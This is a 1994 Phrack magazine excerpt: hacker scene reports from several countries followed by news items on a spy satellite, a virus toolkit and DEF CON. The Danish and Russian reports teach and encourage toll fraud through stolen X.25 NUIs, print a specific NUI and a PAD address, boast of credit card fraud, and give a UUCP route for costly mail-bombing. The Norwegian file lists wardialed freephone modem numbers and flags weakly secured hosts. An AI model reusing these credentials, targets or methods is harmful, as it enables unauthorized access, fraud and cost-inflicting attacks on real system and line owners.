Even though the universities puts such a great effort into keeping
hackers out, they aren't doing very good. In fact, they are doing real
bad. A legit account costs appr. 1900 dkr, which is about a little over
300$ US., which goes into the pockets of UNI*C, so its no wonder that
we like to use the nice free facilities present at the universities.

Other ways to get on Internet, are via other machines under the ministry
of education and certain private and government systems. It's surprising
how many bugs (that we all know of) in certain UNIX versions, that still
have not been patched, and therefore leave the systems wide open.
This goes not only for Denmark, but generally throughout machines on Internet
in Europe. Also, a well known phenomena in DK throughout the sector of
private corporation computer systems, is lousy security. Elementary
stuff like bad file permissions, left over suid shell scripts, and
open guest accounts are everywhere.

Regarding the X25 datapak links. The official Danish PAD can be
reached at dialup 171. This is totally free number just like 80xxxxxx
are, which doesn't affect your phone bill. Keep in mind that all calls made in
DK are billed, even local calls within same city are charged, and charged
high! I remember a time when I was kind of addicted to a certain MUD. For one
month alone I got a bill on 1800 dkr, appr. 300 US$! So, the 171 X25 link is
nice thing, since all calls are billed to the owner of the Network User Id
(NUI) and NOT on your phone bill.

However, X25 can be a dangerous thing to use. Especially if you only
have a single NUI to use. The phone company is having some trouble tracing
the 171, but all calls made in DK on digital lines are logged. So, when
some corporation gets a bill on, say 2-3000$ or an amount much higher
than usual, the phone company can compare the logs on who dialed 171,
to the X25 logs, on which date and time the NUI in question was abused,
and figure out who abused the NUI. On analog lines the logging is
harder to do, and only goes back a month or so. The format of the NUIs
consist of a user number and a password. The first char indicates
either a K or J, depending on the NUI's owner, either located under KTAS
or JTAS districts. Jutland is covered by JTAS and Copenhagen Sjlland,
by KTAS. Then follows 7 or 8 numbers and usually a word of 7-8 chars. Like,
K0100872DKDIANEC, this is a valid NUI open for public use by everybody,
but its restricted to only to connect to a specific system. Sum lame
menu database thing. Most NUI's allows access to most computers, world
wide on the X25 network, by an NUA (network User Address). The most use
of X25 is to gain free access to Internet by connecting to a PAD which
allows telnet. Most of the telnet PAD's has been closed recently because
of an increasing (ab)use. However, there is still sites like isosun-t.
ariadne.gr which carries an X25 PAD, and because the sysadm there comes off
like a dick and is a jerk I'll give u all his NUA. Its 020233181282010. Also,
check out gw.sdbs.dk, carries a 9k6 x25 link as well as normal Inet axx.


A few people to mention, who either has or is playing an important
part of the Danish hacking community:

JubJub Bird, Sprocket, Saron, Ravan, Netrunner / Sense/NET, Descore, WedLock,
Le Cerveau, Parrot-Ice, Jackal, Temp, Therion, and myself I guess... :)

If u like, check out:

Free Speech Inc. (+45) 4 582 5565  SysOp: NiteCrawler
Freeside         (+45) 3 122 3119   -"- : Descore  (Off. CJ Dist. site.)

This is it. Hope u enjoyed this little file. We are always happy to
meet foreign hackers, so call one of the above boards and lets exchange
accou.. ehh... intercultural hacking research information :)

-----------------------------------------------------------------------------


               Why would you or why wouldn't you want
              to hack in the ex-USSR or in other words
                  what the hell do we do up here.

                By Digital Empiror and Stupid Fucker

Russia is a great country, with absolutely no laws against hacking or
phreaking, both are very easy to do and get away with. It's for that
reason, that most of the famous online services like CompuServe and Delphi
closed registrations coming out of the biggest country in the world via
SprintNet, (you guys think we still can't get in? ... take that as a hint).
If some great telephone company installed a payphone that can charge calls
onto a credit card (very rare in this country) then we can use it as well,
credit card numbers are not hard to compile, especially if you know that
it is not really illegal. What about those great cellular telephones, you
know, we love to use those for free, (can't you guys get it? we know that
we are pain in the ass, but LIVE WITH IT!).

Most of our switchboards in Russia are very ancient, screwed up
relay-analog switches, they don't have methods for protocol-ing
telephone calls and present undependable methods for identifying telephone
numbers. Also there is special equipment which allows making it impossible
to detect your phone number, or even making detection equipment mistake your
phone number. Interstate switchboards have to have special methods of
detecting your phone number, which are of course only accessible to
Interstate switchboards and not to the rest of commercial companies. There
was a case once were SprintNet caught one of our great hackers, but he had
sent them to his great grandfather's (wanna try doing that with the
FBI?) because as he said 'You can't really be sure that it was really ME
calling since in this country you can't rely on your number detection
equipment...'

Another great thing is how the networks are set up in Russia. The greatest
and the biggest X.25 network is of course SprintNet (for which they have to
pay of course, if not them then somebody else...), it's a little slow here,
but that's OK. The administrators who set up the PADs are very lame and
stupid, and of course can't set up their PADs like SprintNet would want
them to. They can, for example, they were setting up their PAD so, that it
would let you connect with virtually ANY system without asking for a NUI,
and even when they detected, that hackers do it, they couldn't do anything
besides changing their PAD instead of just changing one register!

Besides that, their is no problem with finding a NUI for Russian X.25
networks, most of them don't support collect calls like SprintNet, so most
Russian services that would like their customers to access their service
via X.25 give the users a unique NUI, that specifies that they can only
access THIS service, but they usually forget to set it up right so the
stupid customers like another of our great hackers, will instead of getting
charged for the service, go to an outdial and call his favorite BBS in
Clearwater, FL for an example (do they have boards there?).  I don't know
if you like to access CitiBank machines from SprintNet, but we love to do
stuff like that.  For example, recently we found a lone standing computer,
I don't think the guys in CitiBank really understood what they were doing
when they left their modem setup option on that machine without a password,
it was a pleasure to change their modem strings knowing that it's absolutely
legal to do so and nobody has even a right to call about it!  Also there
are Internet providers in Russia, only two, from which only one is
interesting - RELCOM!  Most of Internet in Russia is done via UUCP and
costs a bundle of money, so if I am in a bad mood, I'll drop 10-20 megs of
mail into an address that doesn't exist, and will laugh and you know why?
In RELCOM, everybody pays the central router - KIAE.SU, so if you send megs
of stuff, it will go through a lot of systems that will have to pay first
each other then to KIAE.SU, but there will be THE last system, that will
say 'ya know? there is no such address!', so then the trouble will start.
So if you are in a bad mood, then please, do us a favor, drop a gig or 2 to
machine that does not have an IP address, better for it to go via a few of
those machines, for example, to be original:

kaija.spb.su!arcom.spb.su!<any machine in USA>!kiae.su!kaija.spb.su!root

I am sure if you have NSLOOKUP, you can be original and make your best
route via a dozen systems. When doing it, you can be sure, that it will
call a lot of arguments from every one of that dozen concerning to who will
pay for that gig (1mb of mail in Russia costs $50 - $150, that enough money
for poor Russian Internet hosts).

It's all really great, but we are all on our own, and are not organized into a
group.  There are not many of us and we are not known by any of our western
colleagues, to contact us, mail us at:

        an58736@anon.penet.fi

-----------------------------------------------------------------------------
                        PhreeFone Numbers in Norway
                     Research and Norwegian Edition by

                          cyber aktiF (01-Feb-94)

               English Translation by Codex/DBA (26-Apr-1994)
-----------------------------------------------------------------------------

DISCLAIMER: The author of this document takes no responsibility as to how
            the information herein is used. I hope everyone who uses this
            information use it for inquisitive purposes only, and don't
            use it for ANY destructive purposes whatsoever.

WARNING:    Unauthorized use of PBX and other communications equipment
            owned by others, be it private or business, is illegal and may
            result in banishment from the Norwegian telephone company (Tele-
            verket) and/or punishment by law.

                                     ---

After many sporadic travels over the phone network, in other words scanning
the number region 800 3xxxx, I've come across several interesting things. I
therefore thought it was in its right place to make a complete list of which
numbers have a carrier and which have not. The carriers only apply to modems.
Televerket has (currently) allocated the region 800 30000 to 800 3500 for
these services.

These lines are 100% phreefone, which means that the owner of these services
pays for the conversation plus a surcharge per unit. This allows for long
permutations of numbers and passwords without adding to your own phone bill.
On the other hand, the owner of the line will have a phonebill which equals
American Express's.

Televerket and/or the company/person supplying the service(s) have NO problem
finding out what the caller's number is. This is regardless whether or not
you have filled in the "don't reveal my number to those I call" part of
Televerket's connection form/document. Therefore, nosing around these numbers
should be done with some care.

I haven't tried blueboxing 800 numbers (too much work for something which is
free in the first place), but theoretically it is possible. [Codex: Would
this lessen the number identification risk?]

I had severe difficulties with a number which answered with an 1800Hz tone
in 1 second, after which it became silent. This box phoned me in intervals
of 5 minutes from 12:00 the next day -- in other words, an automatic
WarDial :/. If you discover the same problem, the following solution is
a guaranteed success: Program your local trunk to send all incoming calls
to ANOTHER number which answers with an 1800Hz tone. Let this be active an
hour's time, and you should be rid of it.

                                 - MODEM -

The list of numbers where modem carriers are commented with a single line. I
haven't (at the time of writing) done a deeper investigation of any of the
services, so none of them should be inactive.

There are several interesting things -- especially the gateways and the
X.25 PAD. Please note that the security at most of the systems are pretty
good. Obscure terminal types, data locks and systems which won't identify
themselves are the most common types. Someone has done a good job in making
the system safe from unauthorized sources. However, as said before,
phreefone numbers can be exposed to attacks and permutations of zimmering
quantities.

When I had a look at the unidentified services, the best way to connect was
using a raw-mode tty which won't accept special characters. If you run a
cooked-mode terminal, the text will become even more unreadable.

-- Modem carrier tones ------------------------------------------------------

80030004 - Data Lock (1)
80030010 - *no output*
80030067 - *no output*
80030068 - Courier ASCII Dev. adapter
80030078 - Courier ASCII Dev. adapter
80030095 - Modem Outdial (password)
80030115 - *no output*
80030130 - *uknown*
80030180 - *uknown*
80030225 - *no output*
80030301 - *no output*
80030404 - *unknown* - prompts @ter
80030456 - *unknown* - terminal
80030485 - *unknown*
80030456 - Data Lock 4000 (1)
80030514 - garbage - password
80030606 - *no output*
80031040 - *no output*
80031065 - *no output*
80031315 - IBM Aix v3 RISC system/6000 (2)
80031470 - garbage
80031490 - Dr V.Furst. Med. Lab
80031666 - prompts - @ter
80031815 - prompts - <
80031920 - *unknown* - password
80031950 - *unknown* - hangup after 5 seconds
80032165 - Dr V.Furst. Med. Lab
80032340 - *uknown*
80032410 - Wangvs VAX/VMS
80032470 - *no output*
80032480 - Perle Model 3i - V 02.00G - Apotekernes F. Innkj
80032590 - *unknown* - password
80032635 - *unknown* - terminal
80033338 - TSS Gateway (3)
80033443 - *no output*
80033490 - *no output*
80033580 - *unknown* - hangup after 5 seconds
80033601 - *no output*
80033620 - TIU Gateway (3)
80033720 - *no output*
80033815 - *unknown* - hangup after 5 seconds
80033914 - *unknown* dumps lots of texts [Codex: What type?]
80034248 - *unknown* - prompts for login
80034866 - X.25 PAD

(1) DATA LOCK
    If someone can get into one of these, he/she can look forward to getting
    a Nobel prize. Data locks are modem front-end protectors, almost
    impossible to crack without physical access.

(2) IBM AIX
    AIX is one of the best flavors of UNIX there is (even though it was
    made by IBM) -- unfortunately the security at this site was so terrible
    that anyone with a minimal knowledge of UNIX and access to this machine
    could pull it apart blindfolded (making the life really unpleasant for
    the estate agents who own the LAN. Write me for an account ;).

(3) GATEWAYS
    Free internet access within grasping distance if you can break through.
    Not easy, but possible. ;) I am already working on it, so I'm not sure
    how long it will take until they increase the security.

[Codex: Comment about Study-By-Byte removed, as I didn't know what to call
the school in English ;). Another fact was that since no number was provided,
and little seemed to be gained by access to this site anyway, I figured it
wasn't too important. Get hold of cyb3rF is you really think it's needed.]

-- End of modem carrier listing ---------------------------------------------

                              - VOICE/PBX/FAX -

Here, ladies and gentlemen, is the list of all the phones in the 800 3xxxx
region which answer. Which is what, I'll leave up all you people out there.
I have mapped some of the list, but won't spread it [Codex: Yet? ;)].

Only one number per line is noted down. This is to easy the job for everyone
who's going to (and you will try ;) run these numbers through their scanner
scripts on the lookout for PBX's and other oddities.

Good luck guys!

cyber aktiF - 01/02/94

-- Answering 800 3xxxx services ---------------------------------------------

80030000
80030001
80030002
80030003
80030005
80030006
80030007
80030008
80030009
80030011
80030012
80030014
80030015
80030016
80030017
80030018
80030019
80030022
80030023
80030024
80030025
80030027
80030028
80030029
80030030
80030032
80030033
80030035
80030036
80030037
80030043
80030044
80030045
80030046
80030048
80030050
80030051
80030053
80030055
80030057
80030058
80030060
80030065
80030066
80030070
80030071
80030072
80030073
80030074
80030075
80030077
80030080
80030082
80030088
80030094
80030096
80030097
80030098
80030099
80030100
80030101
80030102
80030103
80030105
80030106
80030110
80030111
80030113
80030114
80030116
80030120
80030131
80030136
80030140
80030144
80030151
80030155
80030160
80030166
80030170
80030171
80030175
80030177
80030189
80030190
80030195
80030199
80030200
80030202
80030203
80030205
80030210
80030211
80030212
80030213
80030215
80030222
80030227
80030230
80030233
80030235
80030239
80030250
80030255
80030258
80030260
80030265
80030270
80030275
80030277
80030288
80030290
80030294
80030295
80030297
80030299
80030300
80030302
80030303
80030305
80030306
80030308
80030310
80030311
80030313
80030315
80030318
80030319
80030322
80030323
80030330
80030333
80030336
80030337
80030340
80030344
80030345
80030355
80030360
80030363
80030366
80030377
80030380
80030388
80030390
80030395
80030400
80030401
80030407
80030408
80030411
80030415
80030420
80030422
80030433
80030440
80030445
80030450
80030452
80030466
80030470
80030472
80030475
80030480
80030488
80030490
80030495
80030500
80030501
80030502
80030511
80030520
80030522
80030531
80030540
80030545
80030550
80030555
80030560
80030565
80030566
80030570
80030571
80030580
80030585
80030600
80030601
80030603
80030600
80030601
80030603
80030610
80030616
88030640
80030650
80030666
80030670
80030680
80030683
80030690
80030700
80030701
80030707
80030725
80030730
80030750
80030770
80030777
80030788
80030800
80030803
80030811
80030828
80030830
80030840
80030844
80030850
80030855
80030860
80030866
80030870
80030875
80030880
80030888
80030889
80030890
80030900
80030906
80030910
80030911
80030915
80030920
80030922
80030930
80030940
80030950
80030955
80030959
80030960
80030975
80030990
80030994
80031000
80031001
80031006
80031007
80031008
80031010
80031020
80031030
80031031
80031043
80031044
80031048
80031055
80031058
80031060
80031064
80031066
80031070
80031075
80031080
80031082
80031085
80031092
80031097
80031103
80031108
80031110
80031111
80031112
80031113
80031122
80031123
80031140
80031144
80031150
80031151
80031155
80031160
80031166
80031180
80031188
80031200
80031210
80031211
80031212
80031220
80031221
80031229
80031230
80031231
80031234
80031240
80031241
80031244
80031250
80031255
80031266
80031288
80031290
80031300
80031306
80031310
80031313
80031318
80031336
80031340
80031343
80031344
80031355
80031360
80031366
80031400
80031404
80031410
80031412
80031420
80031422
80031430
80031440
80031441
80031447
80031455
80031460
80031466
80031510
80031535
80031540
80031545
80031550
80031560
80031566
80031570
80031571
80031580
80031590
80031600
80031606
80031610
80031611
80031620
80031630
80031631
80031640
80031660
80031661
80031680
80031688
80031690
80031700
80031701
80031707
80031713
80031717
80031740
80031760
80031777
80031780
80031800
80031801
80031809
80031811
80031820
80031830
80031831
80031833
80031840
80031850
80031851
80031866
80031880
80031888
80031900
80031907
80031919
80031927
80031937
80031947
80031957
80031958
80031959
80031970
80031994
80031995
80031999
80032000
80032001
80032002
80032005
80032008
80032011
80032020
80032032
80032040
80032062
80032066
80032080
80032092
80032101
80032105
80032113
80032123
80032130
80032140
80032144
80032150
80032152
80032155
80032166
80032173
80032176
80032200
80032202
80032210
80032212
80032220
80032222
80032223
80032225
80032232
80032255
80032280
80032320
80032323
80032325
80032330
80032332
80032333
80032350
80032355
80032383
80032390
80032399
80032400
80032412
80032415
80032420
80032424
80032425
80032432
80032444
80032450
80032455
80032460
80032466
80032500
80032511
80032520
80032525
80032530
80032540
80032550
80032555
80032560
80032565
80032571
80032578
80032600
80032639
80032660
80032666
80032668
80032680
80032690
80032750
80032754
80032808
80032820
80032832
80032850
80032875
80032880
80032899
80032900
80032907
80032927
80032987
80032990
80032997
80033000
80033003
80033011
80033013
80033016
80033300
80033301
80033302
80033303
80033304
80033305
80033306
80033310
80033311
80033312
80033313
80033315
80033317
80033318
80033320
80033321
80033322
80033325
80033330
80033331
80033332
80033333
80033334
80033335
80033341
80033345
80033350
80033353
80033355
80033370
80033372
80033373
80033377
80033380
80033383
80033385
80033394
80033399
80033410
80033411
80033420
80033432
80033433
80033440
80033444
80033445
80033448
80033450
80033455
80033456
80033460
80033466
80033477
80033488
80033499
80033500
80033505
80033510
80033515
80033520
80033535
80033540
80033550
80033555
80033566
80033567
80033570
80033577
80033585
80033590
80033600
80033610
80033611
80033616
80033622
80033626
80033630
80033633
80033644
80033650
80033655
80033660
80033666
80033670
80033678
80033690
80033711
80033717
80033730
80033733
80033740
80033760
80033770
80033775
80033777
80033779
80033780
80033788
80033800
80033808
80033810
80033818
80033820
80033833
80033838
80033840
80033844
80033855
80033856
80033860
80033866
80033880
80033888
80033890
80033899
80033900
80033920
80033930
80033933
80033940
80033950
80033960
80033970
80033977
80033980
80033990
80033994
80033999
80034000
80034011
80034020
80034022
80034024
80034025
80034030
80034033
80034034
80034035
80034040
80034043
80034044
80034050
80034055
80034070
80034077
80034080
80034088
80034090
80034100
80034110
80034111
80034115
80034123
80034125
80034134
80034135
80034140
80034144
80034150
80034155
80034160
80034166
80034170
80034180
80034210
80034220
80034222
80034240
80034250
80034260
80034266
80034270
80034880
80034888
80034889
80034910
80034966
80034988
80034999
80035000

-- End of list of answering 800 3xxxx services ------------------------------

This file was brought to you in English by Codex/DBA, 26-Apr-1994. I didn't
ask cyb3rF for permission to translate this document, but I hope he won't
mind. I also understand that the document is of varied use to some people
(those of you who can't dial in free to Norway (cc 47), don't bother), but I
thought any information, however useful might be of some interrest to the
English speaking crowd out there.

Re: cyb3rF, Sicko, BattleAng, Maelstrom, Uridium, Enigma, Golan, BadS, vale_
    and any other people I've forgotten to mention right now (flame me on
    #phreak, guys ;).

I'll be back in Norway in June.

                                                      Codex/DBA, 26-Apr-1994.
-- "Men I haelvete gutar, vaent paa meg!!" ----------------------------------

-----------------------------------------------------------------------------

More about the Argentine Internet scenery.


It's difficult to add something to an already good article like Opii's one,
but here is some info which may interest you besides what you already know:

* The local Net started as late as January 1989, when the National Commission
for Atomic Power (CNEA) connected to the BITNET network. The three first
nodes were: ARGCNE (an IBM 9370-60 mainframe), ARGCNEA1 (IBM/370 158),
and ARGCNEA2 (Comparex 7/68), all running RSCS V1. Release3 for data comm.

The node ARGCNEA2 was (I think it still is) the main link in Argentina to
Bitnet. Until late 1992, they still used a manual DIAL-UP LINK (!) to the
Chilean node UCHCECVM (IBM 4341MO2) at the Chile's National University in
Santiago city, connecting at 9600 bps to exchange mail. I'm not sure about
if the Chilean link is still working, due to the existing new leased line
connection of the government's foreign office.

In mid-1990, the national university of La Plata, joined ranks and also
connected to the Bitnet network. The two nodes, CESPIVM1 and CESPIVM2
(Running on IBM mainframes) also served as hosts to a VAX 11-780, and a
experimental link to some computers in Uruguay's (country) national
University.

Another different beast is what's called the RAN network (National Academic
Network), which is nothing more than a UUCP network connecting a hundred
different nodes through the country. Again, until mid-92 they used X.25
ARPAC connections (!!EXPENSIVE!!) and manual Dial-up calls(!!) for the
"international" connection into UUCO. More recently (two months ago), they
have got their own 64kbps leased line to the US, which finally will let
people around the world to mess and GET into our computers :-).

While the project was to connect to Maryland University (financed by the
US National Science Foundation, they love us), I still don't know what's the
host at the other side of the leased line.

Well, that's the end of the FACTS that I have... now some political opinions:
Things are getting a *little* better, but I don't expect any improvements
for "Joe average" user, since to make things work, we must get rid off the
current LD and data monopoly of the two European private telcos that own us.
Until 1999, they have the exclusive right to use and abuse the market of
both voice and data transmissions, and no competition can enter without
passing through their satellite links (and rates). Very nice for a government
that is always speaking of "free markets".

Until we get AT&T and/or MCI competing for the market, we won't have affordable
rates, and US companies like CIS, Delphi, etc. than could be doing BIG
business NOW, will have to wait until late 1999, when the monopoly ends by
law. (Or, BTW: or they can talk to Mr. Al Gore, so he can kick a little our
beloved president to end the telcos ripoff).

Chileans, in contrast, have a lot better scene, with well-established direct
internet links, an X.25 network with 9600bps access through the country, and
even Gopher servers since a long time ago!.

Following is a quick and dirty list of Internet domains for both Chile and
Argentina:

ARGENTINA:

ar.ar (unspecified)
athea.ar (unspecified)
atina.ar (united nations development programme, argentina) (RAN UUCP HOST)
ba.ar (unspecified)
cb.ar (unspecified)
com.ar (unspecified)
edu.ar (unspecified)
gov.ar (government of argentina)   <- give my regards to our corrupt gvt!
mz.ar (unspecified)
ncr.ar (national cash register corporation, argentina)
nq.ar (unspecified)
org.ar (centro de estudios de poblacion corrientes',)
sld.ar (unspecified)
subdomain.ar (unspecified)
test.ar (unspecified)
tf.ar (unspecified)
tm.ar (unspecified)
buenosaires.ncr.ar (national cash register corporation, buenos aires, arg)
city.ar.us (unspecified)
datage.com.ar (unspecified)
guti.sld.ar (unspecified)
secyt.gov.ar (unspecified)
unisel.com.ar (unspecified)
unlp.edu.ar (universidad nacional de la plata, argentina)

CHILE:

altos.cl (altos chile limiteda. el corregidor, santiago, chile)
apple.cl (axis calderon, santiago, chile)
ars.cl (ars innovandi (el arte de innovar), chile)
bci.cl (unspecified)
campus.cl (indae limiteda. area de computacion, manuel montt, chile)
cepal.cl (comision economica para america latina (cepal) santiago, chile)
conicyt.cl (unspecified) <-- Government education branch
contag.cl (contagio avda. ricardo lyon, idencia, santiago, chile)
cronus.cl (familia fuentealba olea, chile) <-- a family with their node!
difusion.cl (editorial difusion, chile)
eclac.cl (unspecified)
epson.cl (epson, chile)
eso.cl (european southern observatory la silla, la serena, chile)
frutex.cl (frutexport lota, santiago, chile)
fundch.cl (fundacion, chile)
fwells.cl (fundacion wells claro solar, casilla, temuco, chile)
gob.cl (unspecified)  <--- CHILEAN GOVERNMENT! Send a note to Mr. Pinochet!
ingenac.cl (ingenac pedor de valdivia, idencia, santiago, chile)
lascar.cl (university of catolica, chile)
mic.cl (las condes, santiago, chile)
ncr.cl (national cash register corporation, chile)
opta.cl (opta limiteda. las violetas, idencia, santiago, chile)
orden.cl (orden huerfanos piso, fax, santiago, chile)
placer.cl (placer dome) <--- WHAT IS THIZ??? "Pleasure dome?" !!!!!!!!!!
puc.cl (catholic university of chile (universidad catolica de chile)
rimpex.cl (rimpex chile pedro de valdivia, casilla, correo santiago, chile)
safp.cl (superintendencia de administradoras de fondos de pensiones, chile)
scharfs.cl (scharfstein, las condes, santiago, chile)
sisteco.cl (sisteco, santiago, chile)
sonda.cl (sonda digital teatinos, santiago, chile)
tes.cl (d.c.c. sistemas, chile)
uai.cl (unspecified)
ubiobio.cl (unspecified)
uchile.cl (universidad de chile)
ucv.cl (unspecified)
udec.cl (universidad de concepcion de ingenieria de sistemas,)
unisys.cl (unisys, chile)
unorte.cl (universidad del norte, antofagasta, chile)
usach.cl (universidad de santiago de chile de ingenieria informatica,)
uta.cl (universidad de tarapaca, arica, chile)
utfsm.cl (universidad tecnica de electronica, valparaiso, chile)
ac.cam.cl (unspecified)
agr.puc.cl (agriculture department, catholic university of chile
astro.puc.cl (catholic university of chile (pontificia universidad catolica
bio.puc.cl (catholic university of chile santiago)
cec.uchile.cl (universidad de chile)
cfm.udec.cl (universidad de concepcion, concepcion, chile)
dcc.uchile.cl (department o. de ciencias de la computacion)
dfi.uchile.cl (universidad de chile)
die.udec.cl (universidad de concepcion de ingenieria de sistemas)
dii.uchile.cl (universidad de chile)
dim.uchile.cl (universidad de chile)
dis.udec.cl (universidad de concepcion, concepcion, chile)
disca.utfsm.cl (universidad tecnica federico santa maria, chile)
dpi.udec.cl (universidad de concepcion de ingenieria de sistemas)
elo.utfsm.cl (universidad tecnica federico santa maria, )
finanzas.fundch.cl (fundacion, chile)
fis.utfsm.cl (universidad tecnica federico santa maria,)
inf.utfsm.cl (universidad tecnica federico santa maria,)
ing.puc.cl (engineering, catholic university of chile )
mat.puc.cl (mathematics department, catholic university of chile
mat.utfsm.cl (universidad tecnica federico santa maria,
qui.puc.cl (catholic university of chile  santiago)
seci.uchile.cl (universidad de chile)
soft.udec.cl (universidad de concepcion de ingenieria de sistemas,)
-----------------------------------------------------------------------------

Australian Scene Report Part II
by Data King
-------------------------------

This is the sequel to the Australian scene report that appeared in Phrack
Issue 45. There have been a few developments since I wrote that report which I
think people may be interested in.

Old NEWS
~~~~~~~~
But first before I deal with what's new, I need to deal with something that's
old. Shortly after Phrack 45 was published, I received a fakemail that
basically threatened me and also made a lot of claims, I would like to take
this opportunity to reply to the author of this letter.

First of all this person claims I have not been in the scene for ages, well
if I am not in the scene that is news to me!

The letter contained several threats to do something like redirect my
telephone number to a 0055 number, for people outside of Australia, a 0055
is a recorded timed call service.

To this I say: 'Go ahead, if your capable DO IT!'

I wont bother dealing with most of the rubbish contained in the article, it
was just general BS.

Finally I have something to say directly to the person who wrote the mail:
"If your so goddamn good, then don't hide behind fakemail, come out in the
open and let us all fear you, come one get your lame ass on IRC and lets talk!"

Also I was told not to submit anything more to Phrack for publishing or bad
things would happen, Well I guess either I have no phear, or I don't take
these threats seriously.


New NEWS
~~~~~~~~
AusCERT

Australia is forming it's own version of CERT, to be called AusCERT and
based in Queensland, Australia. Everybody is shaking in their boots worrying
- NOT!

Networks

In the last report you may remember I talked about the Australia Military
Network in a very vague fashion, well now I have some more detailed info for
you.

The Australian Defense Forces (ADF) have what they call "the Defense
Integrated Secure Communications Network (DISCON)". This network is
relatively new. Circuit switched operations only began in 1990. Packet
switching came into effect during 1992.

It provides all the ADF's communication needs in terms of data, voice,
video, and so on, secure and non secure communications.

Main control is exercised from Canberra (believed to be from within the DSD
compound at Russell Offices), and the network is interconnected via a total
of 11 ground stations across the country using Aussat.

Also the Australian Federal Police have an internet connection now.
sentry.afp.gov.au is the main machine from what I can tell, from the looks
of it, the machine is either a setup or they don't know much about security.

NeuroCon

There was a Con organized by The Pick held here in Melbourne a little while
ago, from all reports it was a total disaster, once again showing the apathy
of Australian people in the scene.

For Instance the organizers kept the location secret, and where supposed to
pick people up in the city, at several allocated times they did not show up.

When one of the potential attendees rang and asked what was going on they
were told by the organizers: "We are too drunk to come and get you".

Come on guys this is LAME, sure everyone likes a drink, but if you keep the
location secret, make sure someone is able to go and get the people waiting
to be picked up!

HackFEST 94

The Year is quickly approaching an end and as yet I have not managed to
fully organize this event. I am in need of people who wish to speak on various
topics, so if you are so inclined and have an idea, send me mail and we will
see what we can organize.

As always I can be contacted at dking@suburbia.apana.org.au, but please note
my PGP signature has changed, so please do a finger on the account if you want
my new PGP signature.

Information in this article has come from various sources, but they shall
remain nameless as they do not wish the attention of the AFP. They know who
they are, and I send them my thanks - Thanks Guys!


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 28 of 28

              PWN PWN PNW PNW PNW PNW PNW PNW PNW PNW PNW PWN PWN
              PWN                                             PWN
              PWN              Phrack World News              PWN
              PWN                                             PWN
              PWN        Compiled by Datastream Cowboy        PWN
              PWN                                             PWN
              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN

Damn The Torpedoes                                            June 6, 1994
~~~~~~~~~~~~~~~~~~
by Loring Wirbel (Electronic Engineering Times) (Page 134)

On May 3, a gargantuan satellite was launched with little press coverage
from Cape Canaveral.

The $1.5 billion satellite is a joint project of the NSA and the
National Reconnaissance Office.  At five tons, it is heavy enough to
have required every bit of thrust its Titan IV launcher could
provide--and despite the boost, it still did enough damage to the
launch-pad water main to render the facility unusable for two months.

The satellite is known as Mentor, Jeroboam and Big Bertha, and it has an
antenna larger than a football field to carry out "hyper-spectral
analysis" -- Reconnaissance Office buzzwords for real-time analysis of
communications in a very wide swath of the electromagnetic spectrum.

Clipper and Digital Signature Standard opponents should be paying
attention to this one.  Mentor surprised space analysts by moving into a
geostationary rather than geosynchronous orbit.  Geostationary orbit
allows the satellite to "park" over a certain sector of the earth.

This first satellite in a planned series was heading for the Ural
Mountains in Russia at last notice.  Additional launches planned for
late 1994 will park future Mentors over the western hemisphere.

According to John Pike of the Federation of American Scientists, those
satellites will likely be controlled from Buckley Field (Aurora,
Colorado), an NSA/Reconnaissance downlink base slated to become this
hemisphere's largest intelligence base in the 1990s.

[Able to hear a bug fart from space.  DC to Daylight realtime analysis.
 And you Clipper whiners cry about someone listening to your phone calls.
 Puh-lease.]

-----------------------------------------------------------------------------

Discovery of 'Data Processing Virus Factory' In Italy       February 17, 1994
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
AFP Sciences

It was learned in Rome on 10 February that a data processing virus
"factory" -- in fact, a program called VCL (Viruses Creation Laboratory),
capable of triggering a virus epidemic--was discovered in Italy

Mr. Fulvio Berghella, deputy directory-general of the Italian Institute
for Bank Data Processing Security (ISTINFORM), discovered what it takes
to enable just about anybody to fabricate data processing viruses; he told
the press that its existence had been suspected for a year and a half and
that about a hundred Italian enterprises had been "contaminated."

An investigation was launched to try to determine the origin of the program,
said Mr. Alessandro Pansa, chief of the "data processing crime" section
of the Italian police.  Several copies of VCL were found in various places,
particularly in Rome and Milan.

Producing viruses is very simple with the help of this program, but it is
not easy to find.  A clandestine Bulgarian data bank, as yet not identified,
reportedly was behind all this.  An international meeting of data processing
virus "hunters" was organized in Amsterdam on 12 February to draft
a strategy; an international police meeting on this subject will be held
next week in Sweden.

Since 1991, the number of viruses in circulation throughout the world
increased 500% to a total of about 10,000 viruses.  In Italy, it is not
forbidden to own a program of this type, but dissemination of viruses
is prosecuted.

[So, I take it Nowhere Man cannot ever travel to Italy?]

--------------------------------------------------------------------------

DEFCON TV-News Coverage                                      July 26, 1994
by Hal Eisner (Real News at 10) (KCOP Channel 13 Los Angeles)

[Shot of audience]

Female Newscaster: "Hackers are like frontier outlaws. Look at what Hal
   Eisner found at a gathering of hackers on the Las
   Vegas strip."

[Shot of "Welcome to Vegas" sign]
[Shot of Code Thief Deluxe v3.5]
[Shot of Dark Tangent talking]

Dark Tangent:           "Welcome to the convention!"

[Shot of Voyager hanging with some people]

Hal Eisner:             "Well not everyone was welcome to this year's
                        Def Con II, a national convention for hackers.
                        Certainly federal agents weren't."

[Shot DTangent searching for a fed]

Dark Tangent:           "On the right.  Getting closer."

Fed:                    "Must be me!  Thank you."

[Dark Tangent gives the Fed "I'm a Fed" t-shirt]

Hail Eisner:            "Suspected agents were ridiculed and given
                        identifying t-shirts. While conventioneers, some of
[Shot of someone using a laptop]
                        which have violated the law, and many of which are
[Shot of some guy reading the DefCon pamphlet]
                        simply tech-heads hungry for the latest theory, got
[Shot of a frequency counter, and a scanner]
                        to see a lot of the newest gadgetry, and hear some
                        tough talk from an Arizona Deputy DA that
[Shot of Gail giving her speech]
                        specializes on computer crime and actually
                        recognized some of her audience."

Gail:                   "Some people are outlaws, crooks, felons maybe."

[Shot back of conference room. People hanging]

Hal Eisner:             "There was an Alice in Wonderland quality about all
                        of this. Hackers by definition go where they are not
                        invited, but so is the government that is trying to
                        intrude on their privacy."

Devlin:                 "If I want to conceal something for whatever reason.
                        I'd like to have the ability to."

Hal Eisner:             "The bottom line is that many of the people here
                        want to do what they want, when they want, and how
                        they want, without restrictions."

Deadkat:                "What we are doing is changing the system, and if you
                        have to break the law to change the system, so be it!"

